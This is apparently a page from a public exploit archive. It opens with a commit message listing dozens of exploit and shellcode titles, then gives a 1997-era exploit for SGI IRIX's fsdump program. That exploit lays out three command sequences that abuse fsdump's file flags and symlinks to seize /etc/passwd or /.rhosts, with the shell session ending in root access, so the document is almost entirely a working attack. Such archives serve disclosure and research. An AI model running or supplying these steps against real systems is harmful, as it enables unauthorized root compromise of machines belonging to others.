880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
37 lines
No EOL
1.1 KiB
Text
37 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/355/info
|
|
|
|
A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege.
|
|
|
|
Variant 1:
|
|
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
|
|
(count to three, and hit ctrl-c)
|
|
irix% ls -la /etc/passwd
|
|
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
|
|
irix% tail -8 /etc/passwd
|
|
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
|
|
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
|
|
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
|
|
|
|
Tue Feb 25 06:23:48 PST 1997
|
|
Number of inodes total 208740; allocated 31259
|
|
Collecting garbage.
|
|
interrupted
|
|
irix% vi /etc/passwd # remove the encrypted root password
|
|
irix% chgrp sys /etc/passwd
|
|
irix% chown root /etc/passwd
|
|
irix% su -
|
|
irix#
|
|
|
|
Variant 2:
|
|
|
|
cp /etc/passwd /tmp/passwd
|
|
ln -s /etc/passwd rfd.lock
|
|
/var/rfindd/fsdump -F/tmp/rfd /
|
|
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /
|
|
|
|
Variant 3:
|
|
cd /tmp
|
|
ln -s /.rhosts fsdump.dir
|
|
/var/rfindd/fsdump -Fgimme /
|
|
ls -al /.rhosts
|
|
rm -f fsdump.dir fsdump.pag gimme |